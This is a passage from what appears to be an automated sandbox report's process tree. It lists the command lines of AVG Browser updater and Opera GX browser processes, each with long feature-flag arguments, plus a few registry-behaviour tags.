C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\CR_E16C2.tmp\setup.exe"C:\Program Files (x86)\AVG\Browser\Update\Install\{409A7863-8F4B-4540-AFEE-BF6FC3C28354}\CR_E16C2.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=124.0.25039.207 --initial-client-data=0x22c,0x230,0x234,0x228,0x238,0x7ff7b183a3f0,0x7ff7b183a3fc,0x7ff7b183a4084⤵PID:6360
-
-
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler.exe"2⤵PID:9072
-
-
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserCrashHandler64.exe"2⤵PID:9100
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"1⤵PID:4232
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --ran-launcher --started-from-shortcut2⤵PID:1512
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0x1b4,0x1c4,0x7ff9643261d0,0x7ff9643261e0,0x7ff9643261f03⤵PID:4140
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --ran-launcher --started-from-shortcut --lowered-browser1⤵
- Adds Run key to start application
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:2176 -
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_crashreporter.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktopGX --annotation=ver=109.0.5097.98 --initial-client-data=0x1b8,0x1bc,0x1c0,0x1b4,0x1c4,0x7ff9643261d0,0x7ff9643261e0,0x7ff9643261f02⤵PID:3872
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1788,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=1784 /prefetch:22⤵PID:5160
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=1660,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=1828 /prefetch:32⤵PID:1980
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=2104,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=2276 /prefetch:82⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3204,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=3268 /prefetch:12⤵PID:680
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=3292 /prefetch:22⤵PID:2784
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4040,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=4060 /prefetch:12⤵PID:7988
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4192,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:12⤵PID:4648
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4476,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=4520 /prefetch:22⤵PID:6864
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=4648,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=4708 /prefetch:22⤵PID:6392
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=4848,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=4944 /prefetch:82⤵PID:1400
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4376,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5348 /prefetch:22⤵PID:6892
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=4664,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5508 /prefetch:82⤵PID:6844
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5576,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5552 /prefetch:12⤵PID:6980
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=5640,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=5712 /prefetch:22⤵PID:7060
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off 